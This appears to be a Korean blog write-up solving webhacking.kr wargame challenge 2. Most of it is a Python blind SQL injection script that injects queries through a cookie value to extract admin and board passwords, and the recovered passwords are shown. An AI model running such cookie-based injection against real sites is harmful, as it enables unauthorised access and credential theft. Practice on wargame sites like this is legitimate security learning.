table명은 게싱
freeboard와 admin의 password를 blindsqlinjection하고 board에서 주는 zip파일을 adminpage에서 admin 비번을 넣고 받은 비번으로 압축해제하면 key를 얻는다.
#webhacking.kr 2번 import http.client import urllib import string def inj(q): con=http.client.HTTPConnection('webhacking.kr') head={'Host':'webhacking.kr'} head['Upgrade-Insecure-Requests']=1 head['Cookie']='id=aaa; PHPSESSID=ddddd; time=1487488213 and '+q con.request('GET','/challenge/web/web-02/',headers=head) r=con.getresponse().read() #print(r) return b'09:00:01' in r #print(inj('(select length(password) from admin)=10;')) arr=list(string.ascii_letters+'1234567890') print(arr) adminpw='' table='admin' #FreeB0aRd for i in range(5,6): for a in range(95,100): q='(select ascii(substring(password,'+str(i)+',1)) from admin)='+str(a)+';' print(q) t=inj(q) print(chr(a)) print(t) if t: adminpw+=a print(adminpw) break for i in range(5,11): for j, a in enumerate(arr): q='(select ascii(substring(password,'+str(i)+',1)) from '+table+')='+str(ord(a))+';' print(q) t=inj(q) print(a) if t: adminpw+=a print(adminpw) break print(adminpw) adminpw='0nly_admin' freeboardpw='7598522ae'
'war game > webhacking.kr' 카테고리의 다른 글
[webhacking.kr]57번 (0) | 2017.02.19 |
---|---|
[webhacking.kr] 41번 (0) | 2017.02.01 |
[webhacking.kr]55번 left right을 이용한 blind sql (0) | 2017.01.31 |
[webhacking.kr]22번 blind sql injection binary search (0) | 2017.01.30 |
[webhacking.kr 21]blind sql injection (0) | 2017.01.30 |